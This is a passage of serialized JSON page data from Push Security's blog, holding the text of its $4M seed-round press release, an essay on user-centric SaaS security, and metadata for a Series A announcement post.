",{"data":323540,"content":323541,"nodeType":186},{"uri":117883},[323542],{"data":323543,"marks":323544,"value":323546,"nodeType":173},{},[323545],{"type":194},"Twitter",{"data":323548,"marks":323549,"value":933,"nodeType":173},{},[],{"data":323551,"content":323553,"nodeType":186},{"uri":323552},"https://www.linkedin.com/company/push-security/",[323554],{"data":323555,"marks":323556,"value":117876,"nodeType":173},{},[323557],{"type":194},{"data":323559,"marks":323560,"value":323561,"nodeType":173},{},[]," and sign up to our mailing list to come along for the ride!","We’re proud to announce our $15M Series A round, led by GV. Here's what we've learned about what our customers need since we launched in July 2022. ","2023-03-28T00:00:00.000Z",{"items":323565},[323566,323568],{"sys":323567,"name":117242},{"id":117241},{"sys":323569,"name":274157},{"id":274156},{"items":323571},[323572],{"fullName":117936,"firstName":117937,"jobTitle":117938,"profilePicture":323573},{"url":117940},{"items":323575},[323576],{"fullName":323577,"firstName":323578,"jobTitle":323579,"profilePicture":323580},"Jon Oberheide","Jon","Push board member, co-founder and former CTO Duo Security",{"url":323581},"https://images.ctfassets.net/y1cdw1ablpvd/2KPJNN6IWpB4rDtsnox5BH/77ea22710f9ae8c989ba4e05f5d7dcc3/jon-oberheide.jpeg","content:blog:push-it-real-good-why-im-excited-to-join-pushs-board.json","blog/push-it-real-good-why-im-excited-to-join-pushs-board.json","blog/push-it-real-good-why-im-excited-to-join-pushs-board",{"_path":323586,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":323587,"ogImage":118,"summary":323589,"title":323027,"subtitle":118,"metaTitle":323600,"synopsis":323562,"hashTags":118,"publishedDate":323563,"slug":323028,"tagsCollection":323601,"relatedBlogPostsCollection":323607,"authorsCollection":324184,"content":324188,"_id":324688,"_type":5439,"_source":5440,"_file":324689,"_stem":324690,"_extension":5439},"/blog/from-launch-to-series-a",{"id":322741,"publishedAt":323588},"2024-09-12T08:44:12.794Z",{"json":323590},{"data":323591,"content":323592,"nodeType":165},{},[323593],{"data":323594,"content":323595,"nodeType":178},{},[323596],{"data":323597,"marks":323598,"value":323599,"nodeType":173},{},[],"We’re proud to share that we’ve locked in our $15M Series A round, led by GV. Here's what we've learned.\n","Push Security series A announcement ",{"items":323602},[323603,323605],{"sys":323604,"name":117242},{"id":117241},{"sys":323606,"name":274157},{"id":274156},{"items":323608},[323609,323828],{"__typename":1528,"sys":323610,"content":323611,"title":323816,"synopsis":323817,"hashTags":118,"publishedDate":323818,"slug":323819,"tagsCollection":323820,"authorsCollection":323824},{"id":323060},{"json":323612},{"data":323613,"content":323614,"nodeType":165},{},[323615,323647,323654,323661,323668,323675,323682,323689,323708,323715,323722,323751,323759,323777,323785,323792,323810],{"data":323616,"content":323617,"nodeType":178},{},[323618,323622,323630,323634,323643],{"data":323619,"marks":323620,"value":323621,"nodeType":173},{},[],"Push Security, a provider of technology enabling secure SaaS adoption and usage, today announced it completed a $4 million seed round led by ",{"data":323623,"content":323625,"nodeType":186},{"uri":323624},"http://decibel.vc/",[323626],{"data":323627,"marks":323628,"value":117772,"nodeType":173},{},[323629],{"type":194},{"data":323631,"marks":323632,"value":323633,"nodeType":173},{},[]," and backed by ",{"data":323635,"content":323637,"nodeType":186},{"uri":323636},"/about/",[323638],{"data":323639,"marks":323640,"value":323642,"nodeType":173},{},[323641],{"type":194},"prominent industry leaders",{"data":323644,"marks":323645,"value":323646,"nodeType":173},{},[],", including Jon Oberheide, co-founder of Duo Security, and Haroon Meer, CEO and founder of Thinkst. With this funding, Push will continue to develop technology that guides employees to make smart decisions while they are using company SaaS platforms, enlisting their help to improve security.",{"data":323648,"content":323649,"nodeType":178},{},[323650],{"data":323651,"marks":323652,"value":323653,"nodeType":173},{},[],"In a cloud-first world, employees are moving fast and adopting SaaS platforms to get things done. Most organizations have hundreds of SaaS apps in use in their environment and the majority of those apps are owned by employees rather than IT or security. SaaS makes productivity gains and technical innovation accessible for companies of all sizes, but it also introduces risk to the business unless it’s properly managed. Without a way to ensure employees are using SaaS securely, many organizations resort to try to control SaaS with highly restrictive policies, which is frustrating for both employees and security teams.",{"data":323655,"content":323656,"nodeType":178},{},[323657],{"data":323658,"marks":323659,"value":323660,"nodeType":173},{},[],"Push believes that the best way to support this move toward productivity and flexibility is to adopt a user-centric approach — to equip employees to improve their own security while using SaaS. ",{"data":323662,"content":323663,"nodeType":178},{},[323664],{"data":323665,"marks":323666,"value":323667,"nodeType":173},{},[],"“The world of work is shifting in a big way,” said Adam Bateman, Push co-founder and CEO. “Employees want flexibility and they need the right tools to be productive, but those tools aren’t always company-approved. So, they’re signing up for those tools on their own. Security teams want to assert some control over this because SaaS apps introduce risk to their company, so they often try to simply lock down SaaS. However, in the long run this just encourages employees to work around the security team. You can’t secure SaaS that’s owned by employees without working with employees. We’ve built a lightweight, scalable way to let employees use SaaS responsibly, guiding them to actually fix security issues, while offloading work from security teams. We’ll prove along the way that employees don’t need to just be seen as part of the problem, but can actually become part of the solution.”",{"data":323669,"content":323670,"nodeType":178},{},[323671],{"data":323672,"marks":323673,"value":323674,"nodeType":173},{},[],"“The future of cyber resilience in a SaaS-first world needs cloud-scale solutions designed for the user,” added Ollie Whitehouse, angel investor and CTO at NCC Group. “Push has delivered a solution that has unlimited potential to provide value to all organizations in such a world.” ",{"data":323676,"content":323677,"nodeType":178},{},[323678],{"data":323679,"marks":323680,"value":323681,"nodeType":173},{},[],"Jon Sakoda, Push investor and founder of Decibel, invested in Push’s vision for the future and scalable approach to a really difficult problem. “The Push team has set out to help organizations of every size safely adopt SaaS,” said Jon. “The co-founders have deep security experience as researchers and red teamers, and they’re applying that knowledge to an exponentially growing problem that no one else has been able to solve. I can’t wait to see what the Push team will do to apply user-centric security to finally help organizations progress beyond traditional security solutions that have not been able to keep up with the pace of modern IT.”",{"data":323683,"content":323684,"nodeType":178},{},[323685],{"data":323686,"marks":323687,"value":323688,"nodeType":173},{},[],"“Push is connecting the dots between users and their SaaS applications, allowing them to use the apps they love while keeping their organization secure,” added Jon Oberheide, angel investor, co-founder and former CTO of Duo Security (acquired by Cisco). ",{"data":323690,"content":323691,"nodeType":178},{},[323692,323696,323704],{"data":323693,"marks":323694,"value":323695,"nodeType":173},{},[],"Push is free to try and free to use for up to 10 users. Visit ",{"data":323697,"content":323698,"nodeType":186},{"uri":97117},[323699],{"data":323700,"marks":323701,"value":323703,"nodeType":173},{},[323702],{"type":194},"pushsecurity.com",{"data":323705,"marks":323706,"value":323707,"nodeType":173},{},[]," to sign up and start your trial.  ",{"data":323709,"content":323710,"nodeType":178},{},[323711],{"data":323712,"marks":323713,"value":15112,"nodeType":173},{},[323714],{"type":370},{"data":323716,"content":323717,"nodeType":178},{},[323718],{"data":323719,"marks":323720,"value":323721,"nodeType":173},{},[],"Push provides a super scalable way to secure SaaS, by equipping employees to join the fight against attackers and improve their own security. We monitor employee SaaS activity and then (using tools such as ChatOps and a browser extension) provide them with just-in-time guidance to help them make good security decisions about how they use and access SaaS.",{"data":323723,"content":323724,"nodeType":178},{},[323725,323729,323736,323740,323748],{"data":323726,"marks":323727,"value":323728,"nodeType":173},{},[],"Push is backed by Decibel Partners. See Push in action at ",{"data":323730,"content":323731,"nodeType":186},{"uri":97117},[323732],{"data":323733,"marks":323734,"value":323703,"nodeType":173},{},[323735],{"type":194},{"data":323737,"marks":323738,"value":323739,"nodeType":173},{},[]," and follow them on at ",{"data":323741,"content":323742,"nodeType":186},{"uri":117883},[323743],{"data":323744,"marks":323745,"value":323747,"nodeType":173},{},[323746],{"type":194},"@PushSecurity",{"data":323749,"marks":323750,"value":197,"nodeType":173},{},[],{"data":323752,"content":323753,"nodeType":178},{},[323754],{"data":323755,"marks":323756,"value":323758,"nodeType":173},{},[323757],{"type":370},"About Decibel",{"data":323760,"content":323761,"nodeType":178},{},[323762,323765,323773],{"data":323763,"marks":323764,"value":37,"nodeType":173},{},[],{"data":323766,"content":323768,"nodeType":186},{"uri":323767},"http://decibel.vc",[323769],{"data":323770,"marks":323771,"value":117772,"nodeType":173},{},[323772],{"type":194},{"data":323774,"marks":323775,"value":323776,"nodeType":173},{},[]," is an independent venture firm, based in Silicon Valley that backs technical founders and helps them find product-market fit and accelerate their business. Decibel invests in early-stage enterprise software companies, with a special focus on Cybersecurity, Developer Platforms, Open Source, and ML and AI Infrastructure and Applications.",{"data":323778,"content":323779,"nodeType":178},{},[323780],{"data":323781,"marks":323782,"value":323784,"nodeType":173},{},[323783],{"type":370},"Contact:",{"data":323786,"content":323787,"nodeType":178},{},[323788],{"data":323789,"marks":323790,"value":323791,"nodeType":173},{},[],"Sally Soulliere, Push Security ",{"data":323793,"content":323794,"nodeType":178},{},[323795,323798,323807],{"data":323796,"marks":323797,"value":37,"nodeType":173},{},[],{"data":323799,"content":323801,"nodeType":186},{"uri":323800},"mailto:sally.soulliere@pushsecurity.com",[323802],{"data":323803,"marks":323804,"value":323806,"nodeType":173},{},[323805],{"type":194},"sally.soulliere@pushsecurity.com",{"data":323808,"marks":323809,"value":37,"nodeType":173},{},[],{"data":323811,"content":323812,"nodeType":178},{},[323813],{"data":323814,"marks":323815,"value":13836,"nodeType":173},{},[],"Push Security Announces $4M Seed Round to Introduce User-Centric Approach to Securing SaaS ","Launches solution that finds SaaS apps employees are using and guides them to fix issues","2022-07-19T00:00:00.000Z","push-security-announces-4m-seed-round-to-introduce-user-centric-approach",{"items":323821},[323822],{"sys":323823,"name":117242},{"id":117241},{"items":323825},[323826],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":323827},{"url":282559},{"__typename":1528,"sys":323829,"content":323831,"title":324173,"synopsis":324174,"hashTags":118,"publishedDate":323818,"slug":324175,"tagsCollection":324176,"authorsCollection":324180},{"id":323830},"4ZNEAZLwXE9Pz3lx1mhEZN",{"json":323832},{"data":323833,"content":323834,"nodeType":165},{},[323835,323842,323858,323865,323872,323879,323887,323894,323902,323932,323939,323946,323953,323960,323967,323974,323981,323988,323995,324002,324009,324016,324032,324039,324046,324053,324060,324067,324074,324081,324088,324095,324102,324108,324115,324142,324149,324156],{"data":323836,"content":323837,"nodeType":169},{},[323838],{"data":323839,"marks":323840,"value":323841,"nodeType":173},{},[],"Blocking SaaS isn’t working ",{"data":323843,"content":323844,"nodeType":178},{},[323845,323850,323853],{"data":323846,"marks":323847,"value":323849,"nodeType":173},{},[323848],{"type":1646},"tl;dr",{"data":323851,"marks":323852,"value":39972,"nodeType":173},{},[],{"data":323854,"marks":323855,"value":323857,"nodeType":173},{},[323856],{"type":1646},"The traditional way of just blocking apps that haven’t been vetted or approved by the security team isn’t working now and absolutely won’t scale as businesses now value flexibility as much as productivity and security. You don’t have to choose one anymore. Empower your employees to be productive and move fast, securely, and partner with them to secure SaaS.",{"data":323859,"content":323860,"nodeType":178},{},[323861],{"data":323862,"marks":323863,"value":323864,"nodeType":173},{},[],"It’s common for organizations to have hundreds of SaaS apps in use at all times and we expect that number to continue to rise. Most companies accept SaaS use because it helps employees be productive and get their work done, but each SaaS app does introduce risk to the company because they require access to business data, employees input data into each app, and the app becomes a part of your larger corporate attack surface. ",{"data":323866,"content":323867,"nodeType":178},{},[323868],{"data":323869,"marks":323870,"value":323871,"nodeType":173},{},[],"Simply blocking SaaS use hasn’t worked to date and, as more and more apps are built, with more and more functionality employees need, blocking and restricting just can’t scale and will widen the divide between security and employees.",{"data":323873,"content":323874,"nodeType":178},{},[323875],{"data":323876,"marks":323877,"value":323878,"nodeType":173},{},[],"But to secure SaaS, security teams need visibility. There are some newer tools on the market built specifically to discover cloud and SaaS adoption (SaaS discovery and shadow IT discovery tools), but they tend to be focused exclusively on knowing what employees are using so that security and IT can enforce rules and controls on that SaaS use in order to keep company data out of the hands of the bad guys. ",{"data":323880,"content":323881,"nodeType":178},{},[323882],{"data":323883,"marks":323884,"value":323886,"nodeType":173},{},[323885],{"type":370},"Instead of focusing on using that SaaS visibility to create and enforce new policies to restrict SaaS use, what if we could leverage SaaS visibility to help employees actually adopt and use SaaS how they want to? ",{"data":323888,"content":323889,"nodeType":178},{},[323890],{"data":323891,"marks":323892,"value":323893,"nodeType":173},{},[],"We’re trying a different approach that puts more trust in employees’ desire and ability to keep themselves secure. ",{"data":323895,"content":323896,"nodeType":169},{},[323897],{"data":323898,"marks":323899,"value":323901,"nodeType":173},{},[323900],{"type":370},"Introducing a user-centric approach to securing SaaS ",{"data":323903,"content":323904,"nodeType":178},{},[323905,323909,323916,323919,323928],{"data":323906,"marks":323907,"value":323908,"nodeType":173},{},[],"\nThe user-centric movement has been successfully adopted by industry leaders like ",{"data":323910,"content":323912,"nodeType":186},{"uri":323911},"https://slack.engineering/distributed-security-alerting/",[323913],{"data":323914,"marks":323915,"value":226380,"nodeType":173},{},[],{"data":323917,"marks":323918,"value":2936,"nodeType":173},{},[],{"data":323920,"content":323922,"nodeType":186},{"uri":323921},"https://netflixtechblog.com/introducing-netflix-stethoscope-5f3c392368e3",[323923],{"data":323924,"marks":323925,"value":323927,"nodeType":173},{},[323926],{"type":194},"Netflix",{"data":323929,"marks":323930,"value":323931,"nodeType":173},{},[],", Github, Duo Security. For endpoint security, those user-centric approaches were spot on. They engaged employees to make decisions about their devices that would inform security teams about employee devices. We even developed our own user-centric solution for endpoint devices when working together at MWR (acquired by F-Secure). ",{"data":323933,"content":323934,"nodeType":178},{},[323935],{"data":323936,"marks":323937,"value":323938,"nodeType":173},{},[],"When it comes to securing SaaS, working directly with users (employees) is not just a huge value add, it's essential. That's because the SaaS apps employees are using are giant unknowns - they’re not known entities or endpoints like employee devices - so you can't find out about or address security issues in SaaS apps without working with employees who are using those apps.",{"data":323940,"content":323941,"nodeType":169},{},[323942],{"data":323943,"marks":323944,"value":323945,"nodeType":173},{},[],"SaaS is owned by users, so needs to be secured by users",{"data":323947,"content":323948,"nodeType":178},{},[323949],{"data":323950,"marks":323951,"value":323952,"nodeType":173},{},[],"Scared yet? We get it, and we don’t expect you to relinquish all control of security and hand it off to employees. But stick with us for a second… There’s a stat making the rounds that suggests that more than two-thirds of SaaS is owned by employees. They’re self-adopting SaaS, integrating it with your business data, and using those tools to work faster, smarter, and generally be more productive. So, while it may not make sense to give up and just let employees continue doing what they’re doing with zero oversight, there’s a scalable way to meet in the middle. ",{"data":323954,"content":323955,"nodeType":178},{},[323956],{"data":323957,"marks":323958,"value":323959,"nodeType":173},{},[],"We decided to focus on improving the security of SaaS use by equipping employees to help. If this approach lets employees freely adopt and use SaaS, then it’s a win for both employees and security teams.",{"data":323961,"content":323962,"nodeType":178},{},[323963],{"data":323964,"marks":323965,"value":323966,"nodeType":173},{},[],"Could user-centric security concepts be used to secure SaaS and cloud application usage - not just securing access to SaaS, but restricting excessive app permissions, removing unused cloud apps and shadow IT, and so on?  ",{"data":323968,"content":323969,"nodeType":178},{},[323970],{"data":323971,"marks":323972,"value":323973,"nodeType":173},{},[],"SaaS is user-powered. They’re adopting it and using it on their own already. Trying to secure SaaS by either completely restricting its use or only allowing employees access to a handful of corporate-sanctioned apps won’t scale. It would be naive to ignore the fact that SaaS introduces risk. Each app requests access to business data, employees have to integrate the apps into your systems and they’ll be inputting business data into the app. Which means that each app becomes a part of the attack surface security teams must protect.",{"data":323975,"content":323976,"nodeType":178},{},[323977],{"data":323978,"marks":323979,"value":323980,"nodeType":173},{},[],"The old way of dealing with this was just to block SaaS as soon as the security team discovers an app in use, or requiring administrator approval before integrating with other SaaS - keeping the security team in the role of the enforcer or blocker to employee SaaS use. Everyone hates that way - employees and security teams. But leaving SaaS adoption wide open is a security nightmare. So where do you start when it comes to securing SaaS use? With the owners of SaaS - the users.",{"data":323982,"content":323983,"nodeType":235},{},[323984],{"data":323985,"marks":323986,"value":323987,"nodeType":173},{},[],"You can’t secure SaaS without involving the user",{"data":323989,"content":323990,"nodeType":178},{},[323991],{"data":323992,"marks":323993,"value":323994,"nodeType":173},{},[],"To secure SaaS, you need to: ",{"data":323996,"content":323997,"nodeType":178},{},[323998],{"data":323999,"marks":324000,"value":324001,"nodeType":173},{},[],"1) know what SaaS employees are using and how they’re using them",{"data":324003,"content":324004,"nodeType":178},{},[324005],{"data":324006,"marks":324007,"value":324008,"nodeType":173},{},[],"2) know what data the app has access to and what it requires",{"data":324010,"content":324011,"nodeType":178},{},[324012],{"data":324013,"marks":324014,"value":324015,"nodeType":173},{},[],"3) find out if security controls are missing and then chase employees to enable them improve",{"data":324017,"content":324018,"nodeType":178},{},[324019,324023,324028],{"data":324020,"marks":324021,"value":324022,"nodeType":173},{},[],"The most logical way to get this information is to talk to your employees directly, but that can’t scale. Let’s say you have 200 employees and each is using a dozen SaaS apps in their role. Are you going to go to each employee (through Slack or Teams, over the phone, via email?) and ask what they’re using, how they’re accessing it, what they’re using it for, if they’re still using it, who the admin is, and so on? Even if you ",{"data":324024,"marks":324025,"value":324027,"nodeType":173},{},[324026],{"type":1646},"could",{"data":324029,"marks":324030,"value":324031,"nodeType":173},{},[]," do that, would they even remember all the SaaS apps they’ve started trials with or what they’re using for free? What else would fall under your radar?",{"data":324033,"content":324034,"nodeType":178},{},[324035],{"data":324036,"marks":324037,"value":324038,"nodeType":173},{},[],"To satisfy the three SaaS security requirements we listed above, we’ve decided to focus our initial product efforts on SaaS discovery and getting business context from SaaS users (your employees) to ensure they’re using SaaS securely.",{"data":324040,"content":324041,"nodeType":178},{},[324042],{"data":324043,"marks":324044,"value":324045,"nodeType":173},{},[],"But knowing is just the start - what’s the point of getting visibility if you’re not using it to fix security issues or remove high-risk or dodgy apps?",{"data":324047,"content":324048,"nodeType":169},{},[324049],{"data":324050,"marks":324051,"value":324052,"nodeType":173},{},[],"Guide employees to fix security issues and use SaaS securely ",{"data":324054,"content":324055,"nodeType":178},{},[324056],{"data":324057,"marks":324058,"value":324059,"nodeType":173},{},[],"That’s where the user-centric approach to securing SaaS comes in. We believe employees want to do the right thing and don’t want to be the one responsible for a breach. As long as we make it as easy and quick as possible for them to help and to take action, they will. ",{"data":324061,"content":324062,"nodeType":178},{},[324063],{"data":324064,"marks":324065,"value":324066,"nodeType":173},{},[],"To make this work at scale, we use ChatOps to engage directly with the employee, and a browser extension to prompt users and help them fix SaaS security issues. By helping them self-remediate issues, we offload the more mindless security hygiene work from security and IT, while enabling employees to use the SaaS tools they want.",{"data":324068,"content":324069,"nodeType":178},{},[324070],{"data":324071,"marks":324072,"value":324073,"nodeType":173},{},[],"We can also use this technology to get relevant business context about how they’re using each app and if they’re even still using it. If they say they aren’t using it anymore, we can help them remove it from your attack surface. ",{"data":324075,"content":324076,"nodeType":235},{},[324077],{"data":324078,"marks":324079,"value":324080,"nodeType":173},{},[],"But I can’t trust employees to own security!",{"data":324082,"content":324083,"nodeType":178},{},[324084],{"data":324085,"marks":324086,"value":324087,"nodeType":173},{},[],"There’s an old trope in the security world that users are the weakest link. So, how can we expect “the weakest link” in a company to actually secure the company? We’d like to challenge that old adage and suggest that employees shouldn’t be expected to become security experts in order to secure a business. That’s not their job. ",{"data":324089,"content":324090,"nodeType":178},{},[324091],{"data":324092,"marks":324093,"value":324094,"nodeType":173},{},[],"What employees can do really well is provide context for the security team and to self-remediate the more mundane security issues by using stronger passwords, enabling MFA for SaaS apps, and so on. ",{"data":324096,"content":324097,"nodeType":178},{},[324098],{"data":324099,"marks":324100,"value":324101,"nodeType":173},{},[],"We believe the key to making the user-centric approach work is to give users clear, easy to follow instructions and asking them questions they can answer without Googling for more information. We ask questions to get useful context and then enrich SaaS usage data for admins so they can make decisions about what SaaS is appropriate for their business.",{"data":324103,"content":324107,"nodeType":312},{"target":324104},{"sys":324105},{"id":324106,"type":317,"linkType":318},"7eWh1U86EEbSFeJdXIPUZl",[],{"data":324109,"content":324110,"nodeType":169},{},[324111],{"data":324112,"marks":324113,"value":324114,"nodeType":173},{},[],"Making user-centric security work in the real world ",{"data":324116,"content":324117,"nodeType":178},{},[324118,324122,324127,324133,324138],{"data":324119,"marks":324120,"value":324121,"nodeType":173},{},[],"Getting user-centric security to work well requires a near-perfect user experience - it must be quick and easy or they won’t engage with it. We need to understand employees, speak their language, empathize with them, respect their busy schedules, and help them when they’re ready to work with us. One truth remains: ",{"data":324123,"marks":324124,"value":324126,"nodeType":173},{},[324125],{"type":370},"If employees aren’t responding to prompts, assume ",{"data":324128,"marks":324129,"value":324132,"nodeType":173},{},[324130,324131],{"type":370},{"type":1646},"we’re ",{"data":324134,"marks":324135,"value":324137,"nodeType":173},{},[324136],{"type":370},"the problem",{"data":324139,"marks":324140,"value":324141,"nodeType":173},{},[],". We’ll be optimizing continuously based on employee engagement rate. ",{"data":324143,"content":324144,"nodeType":169},{},[324145],{"data":324146,"marks":324147,"value":324148,"nodeType":173},{},[],"Users aren’t the problem, they’re part of the solution",{"data":324150,"content":324151,"nodeType":178},{},[324152],{"data":324153,"marks":324154,"value":324155,"nodeType":173},{},[],"Engaging users to self-remediate SaaS security issues just makes sense and it's by far the most scalable way to secure SaaS. Securing SaaS while balancing the needs of employees and security teams requires that we work together and share the responsibilities. To do this, we need to stop insisting that users are the problem and remember that attackers are the bad guys, not employees.",{"data":324157,"content":324158,"nodeType":178},{},[324159,324163,324169],{"data":324160,"marks":324161,"value":324162,"nodeType":173},{},[],"Follow us on ",{"data":324164,"content":324165,"nodeType":186},{"uri":117883},[324166],{"data":324167,"marks":324168,"value":70282,"nodeType":173},{},[],{"data":324170,"marks":324171,"value":324172,"nodeType":173},{},[]," and subscribe to our blog if you’re interested in hearing about what we’re learning from users along the way. We’d also love your feedback so we can keep improving!","Building a culture of trust to secure SaaS, together","We’re excited to announce our $4M seed round, led by Decibel. See how we’re building tech that allows companies to let employees freely & securely adopt SaaS.","building-a-culture-of-trust-to-secure-saas-together",{"items":324177},[324178],{"sys":324179,"name":117242},{"id":117241},{"items":324181},[324182],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":324183},{"url":282559},{"items":324185},[324186],{"fullName":117936,"firstName":117937,"jobTitle":117938,"profilePicture":324187},{"url":117940},{"json":324189,"links":324642},{"data":324190,"content":324191,"nodeType":165},{},[324192,324218,324224,324230,324246,324252,324257,324262,324289,324295,324301,324314,324320,324326,324365,324371,324377,324383,324389,324402,324408,324414,324420,324425,324431,324437,324443,324449,324455,324460,324466,324503,324509,324515,324520,324526,324532,324538,324543,324549,324555,324561,324566,324572,324578,324584,324590,324603,324616],{"data":324193,"content":324194,"nodeType":178},{},[324195,324198,324204,324207,324215],{"data":324196,"marks":324197,"value":323043,"nodeType":173},{},[],{"data":324199,"content":324200,"nodeType":186},{"uri":323046},[324201],{"data":324202,"marks":324203,"value":323051,"nodeType":173},{},[],{"data":324205,"marks":324206,"value":323055,"nodeType":173},{},[],{"data":324208,"content":324211,"nodeType":1698},{"target":324209},{"sys":324210},{"id":323060,"type":317,"linkType":318},[324212],{"data":324213,"marks":324214,"value":323065,"nodeType":173},{},[],{"data":324216,"marks":324217,"value":323069,"nodeType":173},{},[],{"data":324219,"content":324220,"nodeType":178},{},[324221],{"data":324222,"marks":324223,"value":323076,"nodeType":173},{},[],{"data":324225,"content":324226,"nodeType":235},{},[324227],{"data":324228,"marks":324229,"value":323083,"nodeType":173},{},[],{"data":324231,"content":324232,"nodeType":178},{},[324233,324236,324243],{"data":324234,"marks":324235,"value":323090,"nodeType":173},{},[],{"data":324237,"content":324238,"nodeType":186},{"uri":322714},[324239],{"data":324240,"marks":324241,"value":323098,"nodeType":173},{},[324242],{"type":194},{"data":324244,"marks":324245,"value":323102,"nodeType":173},{},[],{"data":324247,"content":324248,"nodeType":178},{},[324249],{"data":324250,"marks":324251,"value":323109,"nodeType":173},{},[],{"data":324253,"content":324256,"nodeType":312},{"target":324254},{"sys":324255},{"id":280474,"type":317,"linkType":318},[],{"data":324258,"content":324261,"nodeType":312},{"target":324259},{"sys":324260},{"id":280624,"type":317,"linkType":318},[],{"data":324263,"content":324264,"nodeType":178},{},[324265,324268,324272,324275,324279,324282,324286],{"data":324266,"marks":324267,"value":323126,"nodeType":173},{},[],{"data":324269,"marks":324270,"value":3107,"nodeType":173},{},[324271],{"type":370},{"data":324273,"marks":324274,"value":323134,"nodeType":173},{},[],{"data":324276,"marks":324277,"value":323139,"nodeType":173},{},[324278],{"type":370},{"data":324280,"marks":324281,"value":323143,"nodeType":173},{},[],{"data":324283,"marks":324284,"value":3107,"nodeType":173},{},[324285],{"type":370},{"data":324287,"marks":324288,"value":323151,"nodeType":173},{},[],{"data":324290,"content":324291,"nodeType":235},{},[324292],{"data":324293,"marks":324294,"value":323158,"nodeType":173},{},[],{"data":324296,"content":324297,"nodeType":178},{},[324298],{"data":324299,"marks":324300,"value":323165,"nodeType":173},{},[],{"data":324302,"content":324303,"nodeType":178},{},[324304,324307,324311],{"data":324305,"marks":324306,"value":323172,"nodeType":173},{},[],{"data":324308,"marks":324309,"value":323177,"nodeType":173},{},[324310],{"type":1646},{"data":324312,"marks":324313,"value":323181,"nodeType":173},{},[],{"data":324315,"content":324316,"nodeType":178},{},[324317],{"data":324318,"marks":324319,"value":323188,"nodeType":173},{},[],{"data":324321,"content":324322,"nodeType":178},{},[324323],{"data":324324,"marks":324325,"value":323195,"nodeType":173},{},[],{"data":324327,"content":324328,"nodeType":246189},{},[324329,324338,324347,324356],{"data":324330,"content":324331,"nodeType":254},{},[324332],{"data":324333,"content":324334,"nodeType":178},{},[324335],{"data":324336,"marks":324337,"value":323208,"nodeType":173},{},[],{"data":324339,"content":324340,"nodeType":254},{},[324341],{"data":324342,"content":324343,"nodeType":178},{},[324344],{"data":324345,"marks":324346,"value":323218,"nodeType":173},{},[],{"data":324348,"content":324349,"nodeType":254},{},[324350],{"data":324351,"content":324352,"nodeType":178},{},[324353],{"data":324354,"marks":324355,"value":323228,"nodeType":173},{},[],{"data":324357,"content":324358,"nodeType":254},{},[324359],{"data":324360,"content":324361,"nodeType":178},{},[324362],{"data":324363,"marks":324364,"value":323238,"nodeType":173},{},[],{"data":324366,"content":324367,"nodeType":178},{},[324368],{"data":324369,"marks":324370,"value":37,"nodeType":173},{},[],{"data":324372,"content":324373,"nodeType":169},{},[324374],{"data":324375,"marks":324376,"value":323251,"nodeType":173},{},[],{"data":324378,"content":324379,"nodeType":235},{},[324380],{"data":324381,"marks":324382,"value":323258,"nodeType":173},{},[],{"data":324384,"content":324385,"nodeType":178},{},[324386],{"data":324387,"marks":324388,"value":323265,"nodeType":173},{},[],{"data":324390,"content":324391,"nodeType":178},{},[324392,324395,324399],{"data":324393,"marks":324394,"value":323272,"nodeType":173},{},[],{"data":324396,"marks":324397,"value":16081,"nodeType":173},{},[324398],{"type":1646},{"data":324400,"marks":324401,"value":323280,"nodeType":173},{},[],{"data":324403,"content":324404,"nodeType":178},{},[324405],{"data":324406,"marks":324407,"value":323287,"nodeType":173},{},[],{"data":324409,"content":324410,"nodeType":178},{},[324411],{"data":324412,"marks":324413,"value":323294,"nodeType":173},{},[],{"data":324415,"content":324416,"nodeType":178},{},[324417],{"data":324418,"marks":324419,"value":323301,"nodeType":173},{},[],{"data":324421,"content":324424,"nodeType":312},{"target":324422},{"sys":324423},{"id":323306,"type":317,"linkType":318},[],{"data":324426,"content":324427,"nodeType":178},{},[324428],{"data":324429,"marks":324430,"value":323314,"nodeType":173},{},[],{"data":324432,"content":324433,"nodeType":178},{},[324434],{"data":324435,"marks":324436,"value":323321,"nodeType":173},{},[],{"data":324438,"content":324439,"nodeType":235},{},[324440],{"data":324441,"marks":324442,"value":323328,"nodeType":173},{},[],{"data":324444,"content":324445,"nodeType":178},{},[324446],{"data":324447,"marks":324448,"value":323335,"nodeType":173},{},[],{"data":324450,"content":324451,"nodeType":178},{},[324452],{"data":324453,"marks":324454,"value":323342,"nodeType":173},{},[],{"data":324456,"content":324459,"nodeType":312},{"target":324457},{"sys":324458},{"id":323347,"type":317,"linkType":318},[],{"data":324461,"content":324462,"nodeType":178},{},[324463],{"data":324464,"marks":324465,"value":323355,"nodeType":173},{},[],{"data":324467,"content":324468,"nodeType":250},{},[324469,324485,324494],{"data":324470,"content":324471,"nodeType":254},{},[324472],{"data":324473,"content":324474,"nodeType":178},{},[324475,324478,324482],{"data":324476,"marks":324477,"value":323368,"nodeType":173},{},[],{"data":324479,"marks":324480,"value":323373,"nodeType":173},{},[324481],{"type":1646},{"data":324483,"marks":324484,"value":323377,"nodeType":173},{},[],{"data":324486,"content":324487,"nodeType":254},{},[324488],{"data":324489,"content":324490,"nodeType":178},{},[324491],{"data":324492,"marks":324493,"value":323387,"nodeType":173},{},[],{"data":324495,"content":324496,"nodeType":254},{},[324497],{"data":324498,"content":324499,"nodeType":178},{},[324500],{"data":324501,"marks":324502,"value":323397,"nodeType":173},{},[],{"data":324504,"content":324505,"nodeType":235},{},[324506],{"data":324507,"marks":324508,"value":323404,"nodeType":173},{},[],{"data":324510,"content":324511,"nodeType":178},{},[324512],{"data":324513,"marks":324514,"value":323411,"nodeType":173},{},[],{"data":324516,"content":324519,"nodeType":312},{"target":324517},{"sys":324518},{"id":323416,"type":317,"linkType":318},[],{"data":324521,"content":324522,"nodeType":178},{},[324523],{"data":324524,"marks":324525,"value":323424,"nodeType":173},{},[],{"data":324527,"content":324528,"nodeType":235},{},[324529],{"data":324530,"marks":324531,"value":323431,"nodeType":173},{},[],{"data":324533,"content":324534,"nodeType":178},{},[324535],{"data":324536,"marks":324537,"value":323438,"nodeType":173},{},[],{"data":324539,"content":324542,"nodeType":312},{"target":324540},{"sys":324541},{"id":323443,"type":317,"linkType":318},[],{"data":324544,"content":324545,"nodeType":235},{},[324546],{"data":324547,"marks":324548,"value":323451,"nodeType":173},{},[],{"data":324550,"content":324551,"nodeType":178},{},[324552],{"data":324553,"marks":324554,"value":323458,"nodeType":173},{},[],{"data":324556,"content":324557,"nodeType":178},{},[324558],{"data":324559,"marks":324560,"value":3234